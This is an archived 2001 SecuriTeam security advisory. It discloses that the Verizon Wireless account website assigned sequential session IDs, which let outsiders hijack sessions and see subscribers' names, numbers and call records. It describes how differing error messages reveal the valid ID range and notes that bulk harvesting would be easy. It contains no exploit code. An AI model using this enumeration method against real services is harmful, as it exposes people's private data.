[NEWS] Verizon Wireless Website Suffers from Gaping Privacy Holes
From: support@securiteam.comDate: 09/11/01
- Previous message: support@securiteam.com: "[EXPL] AOLserver Exploit Code Released (ParseAuth)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [NEWS] Verizon Wireless Website Suffers from Gaping Privacy Holes Message-Id: <20010911072721.715DE138C0@mail.der-keiler.de> Date: Tue, 11 Sep 2001 09:27:21 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Verizon Wireless Website Suffers from Gaping Privacy Holes
------------------------------------------------------------------------
SUMMARY
Verizon Wireless web site allows cell phone owners to view their account
information. Due to a security flaw with the way Verizon assigns Session
IDs, it is possible to hijack an existing Session ID and gain sensitive
information on the cell phone owner (phone number, name, recent calls
made, and more).
DETAILS
Verizon Wireless (a large US cell service provider) has a website that
allows you to access your account, and do things such as view your bills
and recent usage, and modify your service.
Cell phone bills are often very interesting, since they contain names,
addresses, and a complete record of calls placed and received, along with
the approximate location the user was when the call was made.
A typical URL used by this "my account" service is:
Note the p_session_id parameter. This is the only session identifier used.
They are assigned sequentially to each user as they login, and are valid
until the user logs out or the session times out. Obviously, this makes it
trivial to access the sessions of other users by guessing the session ID.
Automated tools to grab this information in bulk as user's login over time
are also trivial.
Vendor status:
Verizon Wireless was notified about this on August 19th. They are working
on a remedy to the vulnerability.
Finding the right Session ID:
If you pick a session ID below the current range, you get a message
"Unable to validate URL". If you try one above the current range, you get
"Unable to find URL". Naturally, this makes it trivial to zero in on the
current valid session ID range, even by hand.
ADDITIONAL INFORMATION
The information has been provided by <mailto:marcs@znep.com> Marc Slemko
and <mailto:steve.shockley@shockley.net> Steve Shockley.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[EXPL] AOLserver Exploit Code Released (ParseAuth)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
